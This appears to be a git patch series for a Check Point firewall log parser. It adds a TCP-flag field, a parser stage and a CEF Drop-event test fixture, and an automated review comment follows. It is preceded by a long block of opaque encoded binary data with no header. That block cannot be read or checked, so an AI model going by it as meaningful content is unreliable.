z%ecm`Z3J;FHI+*CO7DNN?WWa!<@B+Cn+0}ft;o{zr?8#_dvL<$^kx%UE3%C2V6eI6 zx2;u$0sF9ywY$CPB#~#mua#(=E_sLYB|P1Czf{>485_7&Wa=Aw!DiQUR-?bE*Q|Q};_O)SzN7I8wmJR+y<@Tsu{n8T z%Nb~u6xqdWn=9PgI+$>d*`AJ@+H7|o?iZD2`-kTUI} zSSRAxU^lOv<@Pj=J){aNuRnG8C9L!BW^_NLjEPp9#Ed=UcF?tWN1hr5?E!>fCE*7| 
z$HP>06AOOI_xrO|p1+q{e`M*`+YxQ0$+FBRl^b@W1Z=B0ou5(LywH=}d4Jomf0TY_ zk=>Ev)rGFVL+v9_yP2G}m}->pPKa(-!tceF?oaP+r80N+cS2*NN=*D=Xh)luIyz$# z-1v&$$0f2Eds+;i7j@8FHW|;ept$%u40i^M9M<&`vC>CnE#n4v5TUD#j^CQZ2xbn= zS_^6><=G%x zJumWGaatfRyr_Smy;`2s@sr3NW3fJtzC0W@Ix$*uRXX!gU+ca zUAYuf-TK^9n~Bp18)Jh<7MW+t9;NnY7c|26(}D0}2}e!B+fdETIiBAI75VDtsH2jX zX?)TF_QZJA#%vBZzMVF_-DnLc@4aqPPjm=>2EShPnSd>e9dX~h$Br{ceJEeFsP+35 z6N%~IzYwh1VNoc^eCX(%zr&rRQI*5JkvRG=brTySUQ%H!w-1(^OX0qXqUH&~;<1Qk zES_h9e{#27j~V_>4z_tgnxgF%p)B!i{->lCv-kU+ z3Z($r`05s71G4b-(d;5P?ernI5%}D0-%H$@ZcoMGhuz?n$dsehPy2L+$*t_ zK&a;%NEbvya0K7(DD%dLqEV0`Nzo@*V;8fe&%LAmx++b$KQwRq$SZxrOe#LvE1t194R(j8U$x_RZ z^95%CNf;K)?$x%P-|2>N6A@TqK@%m~X4rz6cXwYAuwgpuLmIlBsukjW@8paf!!NYy8}C6x*oE z{fPL>_zeDo(qqc1a~|^1FOX@SP`nn-2SOW~)SrbQ^UZqcS-=r<8m&SOl~>hLWrbhQ zNAW7xxb5egS}t;5*talYBo(I8?o03rCoa|lq`{b4X+60Sn(HDerMdtY1NS( z5qBDThHw{Vopg>q9e%o7pY!1hFguL$o-_EmZe0@az(Y?#{Q^s6+k{xkxxL%JDK1}2 zYGZl-_!Ad1iErc5!se%FGR_X;SUL1}t)DRq71y#qF6Ev&*?!M?OJDzMi|*Z@3KcX~ zz(zIQWJ#U2FuUA-Cg$G9r32(hW}(nw02{d1`IAmjlXaVXPLGnRfWR-=$z#~Bz)m29i0zBL0TNB6e?rRZMXsYdu$ z$j7EM+pFSrXI7!Ms*ouED!7$I(e-3_^Kmv&YU$M=Sr~DkKh|tk&u4-l?Nqj3T)vrn zIm>Dsr8V6cz_3*))+7>f<6sy!oEi&+G44lAlDsDu$51A*5^gI0hl@a}J_$LTcbE1z zr4_|ueOvm{@S?K-p>H)r*6?EZowJ`6HmVP$5l~8-wwGpM_vG`ia9lBc;vfi2fO(Q; zPs^{1`ebx*@D_xW5E{s{4TIbw`8EAy(`W-85}&5tCNeUt++A<8tmikF`?+rF3Y{Zo zn^^%}frMtbJb7o1@{F;baX4ka86+xHM}dv8+6H8S8sbQtsf8SuB3_!=whW&wzjOE$ zC18RBfXmfyQ?2R$D4YnGC5~#+3(LhXft>MCvNrG5-(%6zpsV6r;$iL~J+qd*aZQyX z5|#>5Ly6S}zZM@S*=KYCikiK`ca?FO@1TIUYmTKXP8FAl?SE*6p6TPUS%&yzeKb7k zMRwW+aga=Vl&1LB5lkj#HrIbFKuG9#Bo)IE5B!_dJ>J|rG zH*hcHGZ!q31!tX?o#mT!Mnzhp;*KEgX-nl*Xrp<^evm6Sn$H&DI@3g9Nxk%WA*YxPp_)%IjVl0+F|bo|9}<#T=68f(A=m6VlucQw0kedW7sSn9k@}H0 z+RJI^I6inXr0E4&gi)Hh5{0W#RWj#8Qf9v5@(oz%gcjylo;Lk5;GCV~AVA5tjHa2m zmODFVYBg;ffAapQizYBI>V4LSiWEE0?JJr3}B_>ZfLaC%Pd!QU*@M^gYg)u?=sD)$f9lR5+HG~H1x zJAXDF@6ZzNI2BGt4jxl%dxlkEiGpW#B@Fk(;S8VIa|5l>O0066wSs4&Pqf`ul&Vm2 zznOrc%Z2Pe_`*etX@i-3R~!jNgh-a 
zOcCopa%wnmaRQRG$il;~K)c&~8f6iDObM?m{PXVN+FIQBLTXyZXKA?a!3eqml?j%- zdUyBRq~HrBGZhw(O04g|(AT9@R{`l@qT}S9B8*#CIz{eD8(Rs~hyE+y$VwoA_9x|7 zLuZ8+jw8GyT#uujAXE%yHM1gIRZIdU%e>xZ)zvGD9bvw+?r|H*T;1CM3c!H4@DJKj znC8;k^LVuynmp#K7-+4EnAM0F=Hu^JE3Zr?1Ay*}H;j4wyNbIdspjFFwlBr*Kd>Gt z?P->AZ{qoCtjGlvYUtt?#%GokooT69r=$<)QJz9b38n+dIrbDXZ6m|V zf|DrO##? zpH1s>Z^w#Lxt%%{$H1A!VD0rKC8v6@XpdTAqV1;N*H+4o@O6yhZs4!W* zv$MR3Gxet!t@C-iHpL^eNVx{Qnkx);6p#8>nnH!R1&#j2<2#Ca;a0^Oos`dpRo_|@ z(Xd2!*Ap(%y>xAmWt40;(1;X&uGY4Q76%YE{>FxD*CtjSlZbM?p9q(1D#cU@v#Sy8 zerEt-)3)RLS z+Xm|+Qo0-pa{Hp8q*EjDT4;@`XDlyXqpX?io#R@3|7LL{zm3MGz~DPtSyDzs=nU>u zHr(=jfuu&R{dyd;p}cJ@`D|r(O|ASAolWtZXW^Evg2&P= zy(UFjg(+ueWxk%AG*NqW@ny9)=rbn@TgwN5yyQW=XCFyDQw1VK5*mt@q>Vnfp~cDw zvb<6F3Tz=aSqTo`Kz>r=!J`je-8y85&zHcX;e+@;GjFt0Qx+x#g_Ow{TU=Adp4KqU)b|3t7TvBF3LvcpI`g-s-s^MIbtymoU+%x2ON-Z|4 zA(y}xQ$5`yV>TSy;75X`p1hHKD#w|ipx*OOA`4%UFT<5ZSjMz^wFSG9HN{vIJIM^> zZ$rUffNmUs8hMwMhOU=c3X|p#O)(x!u6_E*zK;pF6%4p=5pQsBQ(%Em3R)9X-PzQSjFZz`a0CNc`NI({4y!!dsjlk9S=oD@R~s5^aT8 zZJoU8lJ;sH6#QdKGbx96_zk?P{?VRv8ky0Jitbb|?9VN$^_6HDJ$lYRb~ys|;!Sn2 zl9V;P8{Nr%J4){$ty-5w`0|^`cb8X0H`;pz~ zAGs6c9soOLg{z}Z=K@sMACW}vHxKGS&SSStCDVdqdRZqccCFro#Px^#s=ON%x)LL3 zQ!-l<7rt?YD+guXxXvTDl#08~)vi#jX$xpr+Pvxt^2nQ#Om?o|h ztMa7`DMT}7P+3sQG{8t{baZM`{_T`fwLrCO%MKFGGglF8iOCOk)VqxqZAbvu7^ZNd~tf4nLmq@Z#`)H?>*e#hX+&GAiwNTcQAiP zW0L9B2KEZhP(!Pbk&PSQ<2{Y0u80vd>0M}?1`2;-n=sm60fP;ZyB-u7WA&_L2oDM?^t-O^Lg6xPHQunk8k|8e+nz4I# zWIrSEz_(I7&i)M~nMW75 z^#NSsY23spm~Ue7A{YofgxcswQaAr99zLFwpsx|+FVUn}O^y_WYSwwgXOAQ`(0 zAj?s77n+jN1>6K4N9v$WFzUiS#1)$v;EpluBcEq z#VB#Ync~AvBxkyIhGhHk2{~i7_wStCpfWJMnR&c~*J|reJF<=N_~)NXhyd%$`C-)RigQugHH|eZV#rzpffT(REH+omK4zsHa30$GtDI& zoVm?k$hEEt#G{j4^zGrua;3XQS9ctesZ#GGq;EJ!>tQQNPs9id3h~WdHMgUJ|k+*`9Z0YDg!dqgKwtQAg`(G=zqK` z5i=y{cb#D)E|IGydF{p1b%_X7@7g*=uo_U&rAce?xW>E1IOxlkjK8CgdK)lLso2A!C%`r}MQY8mg*&@(5fV7@qGT zpSX~^*~O?8O#n!x`bJaOMEMr@+P7M`t}!P!mDW8gB1*~el>MRHz|Ph0#wEgWHWr(! 
z`HfIHc2JIr-DxboQb|IV8X{P55taCrZI^TWb{Yq2(^yQt#V(Ps>R3NRd zbeYR2a&L#s4RqPagRTl+=6$!?8WMU8+%>FaUSe%^ac#NZ_Wi>HlG8W$ijbU(cZfCt zr5&OjV4(3*%+ke)%iPMv!kWw1$raHqKr{@beO=8h9jra+Ev#+roFzf0J^dhhJ1a?$ zzMuw=hO4~wTRRnhcWYgLO|YfEgQchyNLmU@!dDCd;AHJ-PVejF=>4w4`P4J~?k7k6uV0WJY99!^DHJ8wRa6c)XNyOoWYj)KxZArPM=L2o@h zUB$S$eSCbleE7Ls+-*p-Okn1 z&c&JjFHCa_7cWmq5D0Od{=ejNa@ElIZ+K^qe_8=y4{l#`S8iS|9&RTm?tkU*@Kp3h zfc#US|0{)%`mWB(har=89J80+6;`|HZz>inx92=@QR{Wt3W(*18@ z1eJz{n1YL?*I(kPDoBF?sf>TG%2G_p#ofsqv7B~J=C;<{uFkf9U---5VzOGQk{~`Vp8pxq zay0j}K`=;yUfMZ(`ToxZu$_~&uBZ85*5noD6BG~>;uR7U809PR$TL{I;>+lrZ6{$mmkb8l;_zb8WQ{o|75TXSby zYsCKkr$hbMxZVF{vCIW+g!rxaML8{m%n^%j$!Ec7ZX+bb$;)fQ!*4Fc$0NvV^Y7>$ zE;gP%=I++Awg^oT+8`Y0Z*AyV{x&7+zf=3Xwf@UaJbVJ2JffUD0$^T2F+M&q0YP>i zJ~1915cfY7=KgC}|Ch!R-2We&Nc>IkFJS<|_m43|ctJ!f?*9%~|Fqd(X8eEn^Ut;T ze>ejI`ahHWuk8CDbN$C$|0@gpuZaKSUH>uH|H=aYE8_on*Z*(k!up?t$J!Zj3i3gu zGlE?8lZaFZ%|cyS0qNw=R;yBpsDN;7C1Z|Gnx0u%&tfl|&0n zK!Bo1sPN#{8|pvEuCFD7npzv~7>-5&AY8Oktqgd9g7OI@{sn9c7!%?*f$Tm!XeWWN zUfy_4c&7Ok*%nH?`%IIJxLHsdsC%5>*W=$rVP1bMJ?Fkb@o0P3OJ@WX9sb!&n} zVZhgnk3!JTpItMZ- zwgmKyOuNwa{ZQZK=s}O8Q{m!TseOm6mAF}e8M>K1J<19C2?{M^x*>60-+D5VLlA*& z*-q!@^R?<=g5NBdF@{JhOwgOFNW^LHYqTO*Lu0$r$nu)N( z9I6~v6_%}K0%)N$m*62xrKon+C7nJ+ZGi_y{X*?xVDW080O<8{*ZX<58uUm*-vES^ zuf!n1I*C}^IO3E1$EUz?r7QZ39+HRsrKYDfK?zDoyXG)ywIsDjU0sn$&7R_*&gK_F zv)MxIL{5(|7XY{UahL4ORZsLre(tp$Tv%ID2K>aGxb;hKA?nb+rG2^^HQ7Tc_wJkW zmAb5fuRn@GM1R}&YFZOCu&~|)PN|#^Fm7u=@k%c0@P~+$LzhWsH`jz+;j{vE5aDmJ zGZTg2XO}(=GyuH{wbPu{sT!T%m>U7rYqfL1734nsQ#_$+yL_Mv4G5m@<<_9S?f`8c zQXr8CX68DIc@+&{Zdohg(52G#c@q(o8Qpv{SqT`d-aQL(3&u;77v;nFbr|i$UDIAL zlar^_%ck>i9be7vnBl>P`w{S7Y^Cn7s8~zpDy~n*?obH@;yrd!`Xe99F&S1wtEmOJ zR4_>qgNifoiCd4sOe=$CFothq-1{mF0$|}~XK@w=za0i%S2pzb!&9_ZJ5s50^1gC( zWN5x|fJ|c*8IY3BIkv&yi+JOwpPWkLbfV0jvKnjQV9P_9t@3QepAF}+B@&UNzf|<{ zP!IyX01$;%UNjoPl|=B_)=0$`({TjjEDXW1tE4i{LpqahI;52}8Y`>q~uKHr40qAP!|ND~Ts zs)FvSQNMZJhV4WHpFwd)+Y+YnmIzg>UnSbBnzmcviEtaX(A4qWA6ba^XhlQ$k>N~CNPamrqWL~Z4=wlz28i?u1{ujc@p-? 
z>G7oxGY1n|L0Uh24{3W`w+Ysqh(PkRR?ey&l!7%u&DYu0Ye2_F=+^{oeMq#*yHHn> zGkNZUJ6>0MkT6n;e?v&1)+iYjsX^hPI6SHp`XXLR+(64O_Zm~-`!-f<-N7dLbQcGQ zBxfy6CjvaHkH_#jL`?cbroxB(AC|%uBL6)M4!ve-zdokhB=uHwhOI+z3oU4wi z1Lw!dnxoBihX(nBlHv|#i@MP4HOyj0@a=bl)+02B{OQmx14(zDKdK06vUJ?~kXNdq z!^QqThLE9-9x)DzT#8<}ZugsoV&Mn4Yz=vhlIEM3K$=)b)}i|~hXe9e0{DgT6Tt>Q z)ZdkWBwTjS)>5}($_rld+0BTTV}(Qk^{bNHvt@38(U4o94uKE8orJp`>ywzaC-Gzg zY(60OddHk3inF1=?9*U1tq~43x84(MyikdHz4R;==3RtX=qIf=M;VCCRXXyKoB@gk z(efg!=`o%Eaob9)sUT|BWwIbl4aYnBkg62io&|eeQLlSJv zu^l3W!4#wpK9#%D$v8#VE;)IQF>yuXkeG0wr*tI`FNAwDYRIhZO_+t+Y>>&ahPd}$ z^Klla4}*j=29%^JoyYfcO@`yQ?$@yTIkT|Ha9M{bJNAt&=jyspX72`XNm7<>rCr4#HnPEqV11Ek)O421ewI^zjMpkPGf;rKPosjjmTF z+e}=Yo=KI7s@4N##Z*o88oDQn`KBlm zNU8dDhb-|bm3XrD0`6~llh913g9TCt=@eLu-j?k--*H~Czc@78u(L9{cnLWBHMFAo zgd{SmN{L>Z%72iH16F>|4!%myL~?-R=`{MaGt323%@(0(>kqPa7amf9`|%|xjRM>_ zErLyTV-BtFv9)_CXSt1LZ&E^`*X6F+u^*W8#x=k| z88A7^fVc^h&Y4CW$U~11r=Z4UnPRDo_S--f0l;(^iQpC@NVs6#lR3aB9Y?zcV3&aG+5`+UxhW;*`Vd&(AYX$q>hY6yv*h-#y@Zf%CB>%tOVwLi`nGx4>z7 z+00atK9mJD$PKHK$yenQe-&27{oL35$ycHqAL$Q9^`E!kpjbe)^(+xsOf4)=XL{|8w%wU*GV~wSRD;M+)=8p!bZk*&iUD=P7P| z1(RL|t?DlJ5};?_?ydC2)Z=fTrz=_HTBc@{6r^AS)a+bL>W0x=*(kdP-RZ7xlJig4 zZYxF6+tr$~S46TiFmDtzSXE(@E5F5S0J?c<_IOZTL#fs#(#CdiM&k>STN-d9$oP+Y zROpyNYJw^j4?u|ZMkYm>UP~J5mW((;=aCUCoiq{>&=69v+x94a!u0p;v@DcJ>p_uZ z1q$?~14(mTI9BLc5vdYA2u~AJ+Ya#*Jt*;hW5>Y0sru1LGE3%~Kiuni0uRX#O|C7+ zIa&9pvr_vc@@a|_a&+psF^Ujm!EWE62hZ1`v946<{Of@Cf*KC>#jBVPfN6HOoA>k_ zfhHSo6@m}C9-m&0wpE4kGD?1idI-Oy>*8I?()xv4Y6*awI@PsCdRdxK2tk=VtNH{JzA%OY8% z^2K6MXA3+rHj5i-|G_BUSTpdhd}f7G!Q|D9>d`SW2g-x7lh?Zj#3?9*c+MM13d)T* zQAB57_u>*6rwp^s>T0bjM7sFe=>KYfU%a=)Zo-F#;Hdpk%ba4+elYp&t-l5k-Iu-F^T(F?e3*m{D_FTF%DULO%x{x8)lw;|uP z=eJ}Helrf`YLj;DiVf8vLb=ey)vJl_$B%~dMUo$n4(jIfYcoy>XNgeyPAfd}dKsF) zKP6c#Rh7o{id$RRp<$SB8W-XyqQ3irQxvYc>7h>R>;*aED4S|&X@5#2fA{^V4cB@6 zQJmrOs>UB#A1MzrpTjka-DcF^g)=(pjQipMy?TE-or7?sbQw59xWctFehk~U z@*3}-BJqW0d{t}eMwcXoe43U_7jJ6^j$C!oWzL{Zm6>`1K05AUz 
zA&G)=H6_JL7=QURx8xKWOf^Wd+rsXMcO*x=YRIpZ^d~g5Q2Ci2Wyy1Tk}g~W5Qy%M z%&cZa#7v2JIDy@`gJxFotE11hVF3so*s)n|Kflv$_s4icmtkHq(zv!?S6fnf<2P$f zJMR+;N3%EChTX6mn-|#;q=v+>opHMQB;tTBoaYS@Z*{td2HcPFp-$;7%a{tVxAZ6$M18HSUw`V)WZxEyMeMzI69;_wSJS%(UNohrVKBThG^FbM0g?WTx z_M=?Sk)4fBT8Ly1k(t@^5!wKwEDWkO=*TU15?PK0)JqPpYeqP+V*G1_c*wu zF-EhfJ-EXzu@V3SY+7F`Mq}`LK>LMwlCdo?71l`aXsrOF*z3^I*0v#{XCX=2IeRaL zLXQ5yl<2vLs4&`s=T9N3Sj!3>_0TU$MDH#|HBp0{6<7FfYCP98kU3@{g12JtDWU^w z3H@WR@dhAp5nv+f+~wuB#?Oa^00kXqYk0h6Xmjk$i!(<76Yn>PT3ZIu4>Cg;T`Coe zc{+MC&~LXhsq70)c0noiNl0yS_HGY5VWb6m^2soY;*iczCYT@gjUd#`Pk>%S1NH@R z=1!NWf;pG2dOTub~da^9Y}Y`Y><4&vGHPnfbZ5He?%GM2cX z@5=jfuog8k_Riiz&(>L+-ZNUl^x9-!mhSDJ-sjQZA@$4Uq~uV2XzTCVZO2!G`XaIh zFzY=R)TjEuj#BZdk(^ZR${(NCMty@sw|#O5@m;NZ>}H{6v?MS%aWP#1u8)-dVx;bM zP-?=0Om)@FB3Z^ocFCARCtV3rH_PFzvZh_3BwOA%E{0Wlp4b>daUzNNCp_pxS$8Je zGU>o4jW8+Wb&BP=ail`^l3QUj3BI#{xzAe-ARV_v%_PI&~Vg<=Mt`Eya>xAwB}bHQ=GhO)iVE=LP{7JcQdF zi0?Y-5KG>?reU7%`@+M6wahB{x%xEL%*_Toq5HqCOX#1|K7P&g#$S;gy}Ap4@t=E5UL z0J2_D;jd@Ez|{r)OWpvBDgkUoF<|Dypr#U~K(-@H&)0jxY%QdFx;X}$ViOLi@&S+M zo=IWMNh-MP_D8*N%f!hh?SwpjIJ$PPi=jcR#-GxFM3stCD_%%>-DPBy%Co3|`S-b< z?A?|dd`c4M1H<)+TLAHhl`Ih)9ZeL8DyR{-bFLM{=N4~AqdO=i7B=T7mJMCZGwgMb zbiidW?BPD67Ye3rG3bMbAc9?sl?ezZ%jWM=6 zMdFKp>}^@ic(NdDN{9uME)jP18_yc&{>k4n43YaOpBehcLC1i@+oyCGv&w zn^0Y?-ga`*xksX=(2CHq=K8k813+X@W%63Bg=;KK7#Q%{!C|RPSI@g1MKYhUQ%dft z%0vb0U8C=>r$Bk)Yv8NcR6`Q3TSlI_=w6cfE5l(!EDpY*z_vLTHumoBFe0VP`sXFO z+P!?SkA4d^fIZf2c~$?EotAO0LZTR*iXI~8$#(eYT|myYa>&!e0OJ_vg%c(E14{$hBEDvb3upaobYb$xZ)cVSV*qxOwZOvPWW$&1G#PU_uxhF2O5V&n(SW@7`!ib#%_Iw{ zk%zd()YqI^h;4@n3elUb5AB~rHE#6wI;eCyChsEn?fZ?R^yS@4un(~Pd5!mh@|7rw zAF<`dU>_>gPaFqsbI`i>tYv}=|NZI*)m_%OgCZ2X>c{|;!<`s7306_v$sCi+&yLvq z*AoNp^n0?t#(!egde|^qAvFDUl$dSzl(u_2QRa`{gx>^p9N|zLYe(LVgRx7__s@Gg zlnE)QV$>0*cF<`5di9({aObAFkWo`iUf_()mavORWL$msb$HXH?(_K;Q|R%X#TXD# zPCz6R`12%Y>^;uY8s1&l%vW{_n$I`efDpZod67QKS)|z%6z%y>9q1eRHb3_0Hx3ci zB1~$Uj0+R0gzCWBry6u$?JZYLri9B&pGOkk<`v8?3#`(HZDeVspLtu0T_>p37q_Ls 
zhKpDHhT035)_AH&cLhV6hBfH=(>a#5z0Ec$~Ra^RU`ps1%e9On*Op@-80F&@hLa9gBH1UJl#B2PGL8 zj4=ij3&_;x;~`3=E4%HoFzEd71D~1WUT?!}dolT8_1zb~ z4Nti~c{B$2Pno;7J~q=`-+?4iu`q7rl$sHA_FJ}q-5Z7r`7qs9O$UfMWuDq9{)%Iw zD0go86cXt>vryaS>z0oVkVLGn_8)pN;h3}KvG{40Nx->cm(##UGBZRCmCy%0HSEcRJHcA zi!J&<0(}LsAnE%E(~CclP)M!~cX&`zurV7uviG66^pScFeM6Y)@WKTp{RjF-F(Gt4 za|(OqqdCUlp3zX$;xms8pkWoPR7+#B!;JGxlJE~~_x1*n-Kw?6)3@TzkI7$=C68n- zdOELQ#6KR>97i2Q$QsAS9ONQA8>gwPPo47j@~(D;4mYx2qG)9)y0Dj(ijH0-QV);} zGjLTM2FYlJST$E}N`yrr>j%`dr;d+2IT9wzd2vBIaBED-hWW!tkQ?<->xzAXBS-KR zesY%ousf3Zt!f7$S#X~wL;0q3L z5wr0xe=llwZ9Fon9TomCx%ke*uuPwsr7*Kj7|H#_ewLE%jMbwrewP!*Zgqx6iq8h|5MwwN&Cr z93nY?Xxj6F>Z6&PTWf?NN^RQ~V}9|0KJFwnyz1$yb##QOza-|1APK^_zU9P`Q7#$c z3qdrU%N`GgrlZ-o$Y4YpcAvWdXqy8cRa*P9L+)YkbZ1rG>4M7woi zbAP?`xb}wX(r?&Jvjz*J;(nmi|HaudE9Ai8$$PcBmL6IUCxL$>Ke;vz379aH1_)Ur zS`FED>vRrerAts~52Aipc!BQE4`rrGWp8QdcUt{eU`JPbCbzQUr%+#!Nfufn~D)dVhUCLuDnp`AFe&Sw;mtB%l^+nlJo1I zzqW;ZQuuCJ{fIQH8{Tw=sNxztlJ2|pR2Oo(Mr7MN)EriVCy?SZZg(K%diq}|r5!d6 z6xQAxoz`_uY|nu6v{PNGN6@t-c`&dW=Qq=IK<<&y!UC3pd~{>F+G~zRvk^oIhZ(5{ zQFPd~hjn;f)90Qosm*KCSSr4VRl%Fx3Z;gou-r?B{gM4WUUnlfFHM(2Y#6YD=p;f1 zDEjC+!F2`8L|(lHK4wmX$u{-Nfh0{F&;DG*KaR&!6>6yOQe&@!Q+pv-@`GZb*z|e! z{6ETth^Ru06nC=L|EQ64shP*Yyl3Ojjw3o@$a)Efr{%76sy?<%ahjKDp2fkhAt6@v zy;PR|*)dUof~qmVP#O{v#?oKU0x-8KrK?Gz1WICHcg&N6mx00wu;D8OlN-npM)hqm z-?1U&A^nr#pw8nEbdIM->_Eg8vhf;>w zQ*8*PeM-fK8p@;jXm_nber8wGBDOy>)E_f<`<+@r)CeKg9hv%{Y;xp__hLA6mGuX{ z%0C~l=#Xtv+d4H<+p>hVpZY*7+f+`h!BLm~p7k;&0yb2tlqN(v3>3%7 zvYgE(+D(R}Ml@f?7LVpQszYb1-SCha2xh0jW3#d~tq0=dfz$k!T#B%1xb@=80Lb$^ z{ZcMSsspN2*oarz%GhpiTM=cl`oaDif}6-cP2{Avhw^@uk)LoD( z>inRb3ze%~5B~rYTOSt?2uuKA4hr-3)}UFL_3D-moMwn0;;tFAgxBo$`g9Mmp*jze6cdw4RL&l9Z7)Kuy|-Eo6`E! 
z*UuK(&pmnA8Te{!Vkl_J|7?u_=o5I=s}G*XRTswb_A|$iU-2F96Jqo-%=@bZ%^$Z}8n!ig0@ge}27F%H4Q0??C8}V+_>~Y*tuw=vJ%*|jco zobUuse+W19A^Np=qhNcob(jXxjSto87O>j~kH72>!5t z`cQW`aXA&Nv978Z58`7xY}0sa1!g_cD&+ZuhF{kbb<2Dk}BynrDniXwC->VgbkL+)E>a8C9K-50LW&s+b4^Kb?E@%RAL!$AGCNs_* z@lnfEPY+jRrN^B?>eI)iE?KZRvjy(@RUlX&v7z&mo*B4UtOl?d1Mi7Ngju!^mu5bx z-)Vrxw9dj_0a{g~u|8zEGIVQk(qH^s@ArpPNT`2oo`Zoxz^SJw756l_s8CO5G|&z5 z9U@Nsq7rNxMdyPkH0ZfDUt1#j7M|6Gl9C1LiX&E$s>r8IgiNiY-Agu%n7+@o)EIH) zroy|a9B!~n8`jW%=w+97WBqiHT@Xp$GEe&GXEQHQGm{4){(l021AhEe zx4l`7NfXDeCVHrfNTless(ME;Ec~DmE-#yDf4``nkG1;-QP*-t=wC$D_MYoM?79A( zUfQ4DsQYYj{p~#0eev?e1Mml|{m&roj%iS8=ma`1)n+hef8YmYOYQ4HDgVa?(z!mM@H5~F zlyibGU$^eXs89HH+CN*{cHDBI2)J=T&t=V z7sJA^hBC6uG?E^F03zoDp~6o@%vC}Ef~vgq+0nbDOc;Jz;q$;G;50&eW1wAjeYvak zHkZ65otvp5CjiF)i&4D_<6Il`FIY8fz-Oi*J$`RQP6y@!e+KSD^^RcDl!xiL)xLwM z+X<1msJ@>h^K${p4~gPG1ln!axBFS|ixj509j?WGK;c+mf8c&pueEUFvas;luz}2J zoh-)eQ7-G>2iO)^MiMOUC-LZ~fQdlTQ&m|AdbujUD@KJS>+`*AP}MJ<)4C~+vmZ%w zw*yEfsot${8;BHQp%DiG!cws}iiw(A{YDTIp z9U0T13AZ=^$N^6QT|k#YXJqYPRz_WQ16wwo+Y*shNrK)vVAnF&x)r#?T76(yG<;lj z1X#5IS~`~rk?lli13DC1fgMQZIX?ru0KAOqQWaS)P(<}Lpf?Hff`!mPTEU3OIDygD zm`zcgEHJHX8BQnZezy%!1iA$Bs`@a8Q>CTFRE# z6q0#>%_Nx(3PfeS$O5ZLS`fVotN@Clx};y^ From 4c9223f8d02f6b17b64426394e183c8698922122 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Thu, 5 Sep 2024 10:20:03 +0300 Subject: [PATCH 004/317] Fix: Checkpoint add flag field --- Checkpoint/checkpoint/_meta/fields.yml | 5 ++ Checkpoint/checkpoint/ingest/parser.yml | 4 ++ Checkpoint/checkpoint/tests/CEF_drop_1.json | 57 +++++++++++++++++++++ 3 files changed, 66 insertions(+) create mode 100644 Checkpoint/checkpoint/tests/CEF_drop_1.json diff --git a/Checkpoint/checkpoint/_meta/fields.yml b/Checkpoint/checkpoint/_meta/fields.yml index f52df839d..9a297d00a 100644 --- a/Checkpoint/checkpoint/_meta/fields.yml +++ b/Checkpoint/checkpoint/_meta/fields.yml 
@@ -152,3 +152,8 @@ source.size_in_char: description: '' name: source.size_in_char type: number
+
+action.tcp.flag:
+ description: The control flag of the data flow
+ name: action.tcp.flag
+ type: keyword
diff --git a/Checkpoint/checkpoint/ingest/parser.yml b/Checkpoint/checkpoint/ingest/parser.yml
index ef31c1886..6b807ae32 100644
--- a/Checkpoint/checkpoint/ingest/parser.yml
+++ b/Checkpoint/checkpoint/ingest/parser.yml
@@ -169,6 +169,10 @@ stages: url.original: "{{checkpoint.message.request}}" user_agent.original: "{{checkpoint.message.user_agent}}"
+ - set:
+ action.tcp.flag: "{{checkpoint.message.cs4}}"
+ filter: "{{checkpoint.message.cs4Label == 'TCP Flags'}}"
+
 - translate: dictionary: "0": "hopopt"
diff --git a/Checkpoint/checkpoint/tests/CEF_drop_1.json b/Checkpoint/checkpoint/tests/CEF_drop_1.json
new file mode 100644
index 000000000..0695322fa
--- /dev/null
+++ b/Checkpoint/checkpoint/tests/CEF_drop_1.json
@@ -0,0 +1,57 @@
+{
+ "input": {
+ "message": "CEF:0|Check Point|VPN-1 & FireWall-1|Check Point|Log|Log|Unknown|act=Drop cs4Label=TCP Flags cs4=SYN-ACK deviceDirection=0 rt=1723938549000 spt=443 dpt=2384 ifname=test151.420 logid=1 loguid={0x66c136f5,0xf4,0x1b6410ac,0x151daa25} origin=1.2.3.4 originsicname=CN=cip-fw-test-1,O=CPSRVP.test.test sequencenum=103 version=5 dst=3.4.5.6 product=VPN-1 & FireWall-1 proto=6 src=1.2.3.4 tcp_packet_out_of_state=First packet isn't SYN"
+ },
+ "expected": {
+ "message": "CEF:0|Check Point|VPN-1 & FireWall-1|Check Point|Log|Log|Unknown|act=Drop cs4Label=TCP Flags cs4=SYN-ACK deviceDirection=0 rt=1723938549000 spt=443 dpt=2384 ifname=test151.420 logid=1 loguid={0x66c136f5,0xf4,0x1b6410ac,0x151daa25} origin=1.2.3.4 originsicname=CN=cip-fw-test-1,O=CPSRVP.test.test sequencenum=103 version=5 dst=3.4.5.6 product=VPN-1 & FireWall-1 proto=6 src=1.2.3.4 tcp_packet_out_of_state=First packet isn't SYN",
+ "event": {
+ "code": "Log",
+ "outcome": "success"
+ },
+ "action": {
+ "name": "drop",
+ "outcome": "success",
+ "properties": {
+ "loguid": "{0x66c136f5,0xf4,0x1b6410ac,0x151daa25}",
+ "observer_type": "VPN-1 & FireWall-1",
+ "origin": "1.2.3.4",
+ "originsicname": "CN=cip-fw-test-1,O=CPSRVP.test.test",
+ "product": "VPN-1 & FireWall-1"
+ },
+ "target": "network-traffic",
+ "tcp": {
+ "flag": "SYN-ACK"
+ }
+ },
+ "destination": {
+ "address": "3.4.5.6",
+ "ip": "3.4.5.6",
+ "port": 2384
+ },
+ "network": {
+ "direction": "inbound",
+ "transport": "tcp"
+ },
+ "observer": {
+ "ingress": {
+ "interface": {
+ "name": "test151.420"
+ }
+ }
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4",
+ "3.4.5.6"
+ ]
+ },
+ "rule": {
+ "version": "5"
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4",
+ "port": 443
+ }
+ }
+}
\ No newline at end of file
From d949428d630f7ade4a525f0a3a3073bb8cdfdd62 Mon Sep 17 00:00:00 2001
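Review bot: The expected block never asserts the drop reason carried by `tcp_packet_out_of_state=First packet isn't SYN`, so this fixture cannot catch a regression in whichever field the parser maps it to, and if the parser does not map it at all (not visible in this hunk) the most diagnostic part of a Drop log is silently lost. Either add the expected key the parser produces for it, or extend the parser to map it (for instance into `event.reason`) and assert it here. Both `event.outcome` and `action.outcome` are expected as `success` for an `act=Drop` event; that is coherent if outcome means the firewall applied its verdict, but a short comment in the parser stating that convention would stop analysts reading it as the connection having succeeded. The file also ends without a trailing newline (`\ No newline at end of file`), which most JSON formatters will keep churning.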
From: "vladyslav.guriev"
Date: Thu, 5 Sep 2024 10:21:57 +0300
